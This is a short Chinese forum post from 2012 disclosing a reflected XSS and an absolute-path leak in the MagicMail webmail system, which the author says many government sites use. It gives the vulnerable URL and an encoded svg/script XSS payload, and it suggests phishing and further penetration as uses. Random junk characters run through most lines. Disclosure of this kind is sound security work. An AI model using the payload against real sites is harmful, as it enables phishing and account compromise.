今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
" L$ V8 k- |5 U, t# q$ m$ z( d. ~; \8 Y6 ?
% ^* r) ~& E$ {; t3 R3 z6 ^包含 一个反射性XSS 以及 绝对路径泄漏$ o( c9 S& B0 a
看了看 貌似全部是linux的。! r L) j2 G6 _5 P
0 E4 T9 @. Y9 B6 {0 z/ |# @9 {关键字:迈捷邮件系统 by MagicMail' a& Q- x8 ^/ `! I/ c3 U1 I0 n; c
: \. C% h1 D d4 A可以看到很多政府网站都用这个邮件系统$ {* w9 ?" T3 l, J4 |3 N
7 Y1 J. o* g0 p4 a
绝对路径 http://madman.in/index.php?login_type=declare&language=
0 A# z ~9 q9 ]/ w! C# t3 B- \$ G i, G% k3 E6 R
' X- Y8 p! P8 ^5 y
* V$ q0 Z8 a" X' ]$ PXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E0 \6 ^6 P+ f% I2 y
! u9 R: y0 w1 o3 U9 t0 ^; D* U- g* C" K/ ~0 `
- I1 S4 n+ l0 u4 G
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等# v% ?3 S7 s" o4 x1 x1 A
* ]0 [( G9 o8 n/ x8 N6 ?1 d
修复方案:看官方补丁吧。% }- q- e! v# \* t
|
发表于 2012-11-9 20:38:41
收藏
支持
反对